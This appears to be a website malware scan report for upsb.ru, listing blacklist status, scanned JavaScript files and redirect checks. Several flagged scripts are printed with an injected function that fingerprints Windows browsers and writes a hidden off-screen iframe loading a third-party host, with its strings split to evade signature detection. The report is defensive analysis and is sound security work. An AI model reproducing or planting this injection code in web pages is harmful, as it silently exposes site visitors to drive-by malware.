Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=upsb.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://upsb.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://upsb.ru/ | 200 OK Content-Length: 65023 Content-Type: text/html | clean |
http://upsb.ru/media/system/js/modal.js | 200 OK Content-Length: 11560 Content-Type: application/javascript | clean |
http://upsb.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 3781 Content-Type: application/javascript | malicious |
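Malicious code - confirmed by antiviruses (see below). The injected function reads navigator.userAgent and, only when "Windows" appears in it past the first character and neither "Chrome" nor "IEMobile" does, uses document.write to add a 138x138 iframe positioned 849px off-screen that loads a page from a third-party host. The style string and the closing tag are split with '+' concatenation, presumably to defeat simple signature matching. The same function appears in every file flagged malicious on this page; since the scan covers only the files it fetched, other scripts on the server may carry it as well.
function Argisuliterkas() {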
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk }); }); window.addEvent('load', function(){ if($$('.subCategory')){ var blocks = $$('.subCategory'); var maxHeight = 0; blocks.each(function(item){ maxHeight = Math.max(maxHeight, parseInt(item.getStyle('height'))); }); blocks.setStyle('height', maxHeight); } }); Antivirus reports:
| ||
http://upsb.ru/media/system/js/caption.js | 200 OK Content-Length: 2636 Content-Type: application/javascript | clean |
http://upsb.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 90712 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk "borderLeftWidth"))||0;return{top:d.top-e.top,left:d.left-e.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||m.body;a&&!ab.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(b){var f,g;if(b===k){f=this[0];return!f?null:(g=fa(f))?" Antivirus reports:
| ||
http://upsb.ru/cache/widgetkit/widgetkit-d133f7eb.js | 200 OK Content-Length: 52997 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}} Argisuliterkas();(function(f){f.browser.msie&&parseInt(f.b Antivirus reports:
| ||
http://upsb.ru/templates/upsb/js/popbox.js | 200 OK Content-Length: 1588 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk box1.status = 'hide'; var fx = new Fx.Style (box1,'opacity'); fx.stop(); fx.start (box1.getStyle('opacity'), 0); if (box1._caller) box1._caller.removeClass ('show'); } },this); box.status = 'show'; var fx = new Fx.Style (box,'opacity',{onComplete:function(){if($(focusobj))$(focusobj).focus();}}); fx.stop(); fx.start (box.getStyle('opacity'), 1); if (box._caller) box._caller.addClass ('show'); } } Antivirus reports:
| ||
http://upsb.ru/templates/upsb/js/cssmenu.js | 200 OK Content-Length: 1824 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://upsb.ru/plugins/content/jw_allvideos/includes/js/mediaplayer/jwplayer.js | 200 OK Content-Length: 133014 Content-Type: application/javascript | clean |
http://upsb.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://upsb.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24803 Content-Type: application/javascript | clean |
http://upsb.ru/plugins/content/jw_allvideos/includes/js/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8527 Content-Type: application/javascript | clean |
http://upsb.ru/modules/mod_jv_headline/assets/js/slideshow6.js | 200 OK Content-Length: 13469 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk } else { oldFx.set({opacity: 1}); oldFx.start({ opacity: [1, 0], top: [0, this.options.slideHeight] }); newFx.set({ opacity: 1, top: this.options.slideHeight }); newFx.start({ top: [this.options.slideHeight, 0] }); } } }); Antivirus reports:
| ||
http://upsb.ru/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 9443 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://upsb.ru/modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.2.js | 200 OK Content-Length: 3687 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk arts[i].removeClass('active'); } else if(i == current_art) { if(!arts[i].hasClass('active')) arts[i].addClass('active'); } }); }); } if(auto_anim){ (function(){ if(!animation) module.getElement('.nsp_bottom_interface .next').fireEvent("click"); else animation = false; }).periodical($G['animation_interval'] / 2); } }); }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: upsb.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 02 Oct 2014 11:57:36 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 02 Oct 2014 11:57:40 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ae8ca5f6c11d626551ee8468db7048=d92bhd1k0g4d6e7hcr5elengb0; path=/
X-Powered-By: PHP/5.4.26
GET / HTTP/1.1
Host: upsb.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 02 Oct 2014 11:57:36 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 02 Oct 2014 11:57:40 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ae8ca5f6c11d626551ee8468db7048=d92bhd1k0g4d6e7hcr5elengb0; path=/
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: upsb.ru
Referer: http://www.google.com/search?q=upsb.ru
Result:
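The result is similar to the first query. There are no suspicious redirects found. This check compares server responses only; the injected scripts listed under "Scanned pages/files" run in the visitor's browser and branch on the User-Agent string, so their effect would not show up as an HTTP redirect here.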
GET / HTTP/1.1
Host: upsb.ru
Referer: http://www.google.com/search?q=upsb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.